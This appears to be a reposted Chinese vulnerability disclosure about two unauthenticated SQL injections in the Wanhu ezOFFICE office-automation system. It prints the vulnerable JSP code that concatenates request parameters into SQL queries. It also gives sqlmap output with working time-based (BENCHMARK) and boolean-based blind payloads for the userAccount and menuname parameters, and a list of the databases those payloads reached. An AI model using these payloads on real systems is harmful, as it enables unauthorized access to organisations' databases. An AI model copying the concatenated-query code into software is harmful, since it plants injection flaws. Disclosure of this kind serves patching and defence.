来源:自学PHP网 时间:2015-04-15 15:00 作者: 阅读:次
[导读] 万户OA两处盲注DBA权限(无需登陆)一处是布尔型盲注,适用万户OA标准版一处是延时盲注,通杀标准版和专业版详细说明:先说通杀标准版和专业版的延时盲注。注入点: defaultroot ou...
万户OA两处盲注DBA权限(无需登陆) 先说通杀标准版和专业版的延时盲注。
<%@ page contentType="text/html; charset=GBK"%> <% //盾安外部邮件登陆检查 com.whir.common.util.DataSourceBase dsb = new com.whir.common.util.DataSourceBase(); try{ java.sql.Connection conn = dsb.getDataSource().getConnection(); java.sql.Statement stmt = conn.createStatement(); java.sql.ResultSet rs = stmt.executeQuery("SELECT * FROM EZOFFICE.OA_MAILLOGIN WHERE USERACCOUNT='" + request.getParameter("userAccount") + "' AND RANDOM='" + request.getParameter("outMailRandom") + "'"); if(rs.next()){ out.print(true); }else{ out.print(false); } conn.close(); }catch(Exception e){} %>
sqlmap identified the following injection points with a total of 125 HTTP(s) requests: --- Place: GET Parameter: userAccount Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: userAccount=' AND 4843=BENCHMARK(5000000,MD5(0x4758714c)) AND 'YsEW'='YsEW&outMailRandom= --- web application technology: JSP back-end DBMS: MySQL >= 5.0.0
漏洞证明:再就是布尔型盲注了,这个只有标准版有。 <% String flag=request.getParameter("flag"); String menuname = request.getParameter("menuname"); if("sync".equals(flag)){ //数据 String s_String = ""; int s_int = 0; String[][] res = null; DbOpt dbopt = null; try { dbopt = new DbOpt(); String Sql = ""; Sql = "select MENU_id,MENULEVEL,MENUVIEW,MENUVIEWUSER,MENUVIEWORG,MENUVIEWGROUP,MENUPARENT,MENUURL,MENUORDER,DESKTOP1,DESKTOP2,menuIdString,isSystemInit,INUSE,LEFTURL,RIGHTURL,MENUCODE,menuname from OA_MENUSET where menuname='"+menuname+"' "; res = dbopt.executeQueryToStrArr2(Sql,18); if(res != null){ String _cnt = dbopt.executeQueryToStr("Select count(*) from oa_custmenu where menu_name='"+menuname+"' "); s_int = Integer.parseInt(_cnt); ....... }else if(s_int>1){ s_String = "查出"+s_int+"条数据,未处理!"; } } dbopt.close(); } catch (Exception e) { e.printStackTrace(); } finally { try { dbopt.close(); } catch (SQLException ex) { } } %> </table> <table width="100%" border="0" cellpadding="0" cellspacing="0" class="pagebar"> <tr> <td><%=s_String%> </td>
web application technology: JSP back-end DBMS: MySQL >= 5.0.0 sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: POST Parameter: menuname Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: flag=sync&menuname=%E8%AE%BA%E5%9D%9B' AND 8760=8760 AND 'pBAh'='pBAh --- web application technology: JSP back-end DBMS: MySQL >= 5.0.0 available databases [3]: [*] ezoffice [*] information_schema [*] mysql
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com